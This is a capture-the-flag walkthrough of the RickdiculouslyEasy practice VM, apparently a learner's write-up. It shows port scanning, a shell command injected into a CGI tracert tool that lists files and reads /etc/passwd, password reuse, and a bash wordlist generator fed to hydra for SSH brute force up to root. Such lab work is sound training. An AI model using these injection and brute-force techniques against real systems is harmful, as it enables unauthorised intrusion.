RickdiculouslyEasy

Setup

I used Ubuntu server 18.04 as a base for my VM guest OS. I SSHed from the host OS to Ubuntu server VM; from here I tried to break into RickdiculouslyEasy VM.

It would be more convinient to attack the vulnerable vm directly from host os but going through an intermediate vm seems safer. I could create checkpoints to rollback if necessary. My data in host was seperate from vulnerable vm, which might corrupt them. You can never be too careful.

IP

RickdiculouslyEasy VM ip was 192.168.56.101. I could do a ping sweep over host addresses to find the ip of all local VM

nmap -v -sn 192.168.56.1/24

nmap

Ran nmap against 192.168.56.101 to find all open ports.

# T4: faster scan; T5 is too aggressive
# -Pn: skip host discovery, treats all hosts as live
# -p-: all ports
# -sV: find which services are currently running on found open ports
$ sudo nmap -T4 -v -Pn -p- -sV 192.168.56.101

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown

ftp

nmap -sC showed that fpt can be signed in without password. Inside, I got 1st flag FLAG{Whoa this is unexpected} - 10 Points

cockpit

192.168.56.101:9090 gave FLAG {There is no Zeus, in your face!} - 10 Points. The login page was broken so there was nothing else to do here.

nc

192.168.56.101:13337 gave FLAG:{TheyFoundMyBackDoorMorty}-10Points.

192.168.56.101:60000 provided a hint that it’s a shell. Used nc to connect and there was a flag file inside FLAG{Flip the pickle Morty!} - 10 Points.

:80

192.168.56.101:80 was just a normal page. 192.168.56.101:80/robots.txt gaves links to 3 other webpages The most important link among them is 192.168.56.101:80/cgi-bin/tracertool.cgi. A quick test showed that linux commands can be injected into cgi script. 192.168.56.101; ls -al lists all files in current dir.

Tried some ls -al, cd and pwd led me to another flag file. FLAG{Yeah d- just don't do it.} - 10 Points

I also found passwords.html which hid winter password in the html comments.

192.168.56.101; ls -al /etc; more /etc/passwd gave the list of all users.

ssh

Port 22 seemed like a fake ssh port while port 22222 is the actual ssh port.

Tried winter password with all found users and it was Summer’s. Inside Summer’s home dir, I got another flag. FLAG{Get off the high road Summer!} - 10 Points

Accessed /home/Morty, there were 2 files, an image and a password-protected zip file. Opening the image with vim, I saw the zip password Meeseek. unzip -c journal.txt.zip gave FLAG: {131333} - 20 Points

Inside /home/RickSanchez, there is a binary file safe which can be read by all but only executed by RickSanchez. cp safe /home/Summer/ copied the file and the new file is owned by Summer.

$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.�	@

brute force

I created a bash file to generate all possible passwords:

#!/bin/bash

band=("The" "Flesh" "Curtains")

for i in {A..Z}
do
    for j in {0..9}
    do
        for k in "${band[@]}"
        do
            password="${i}${j}${k}"
            echo $password >> rickpass.txt
        done
    done
done

Then I used hydra to brute force RickSanchez’s password:

hydra -l RickSanchez -P rickpass.txt ssh://192.168.56.101:22222

The password was P7Curtains.

sudo -i to go to /root dir and got the last flag. FLAG: {Ionic Defibrillator} - 30 points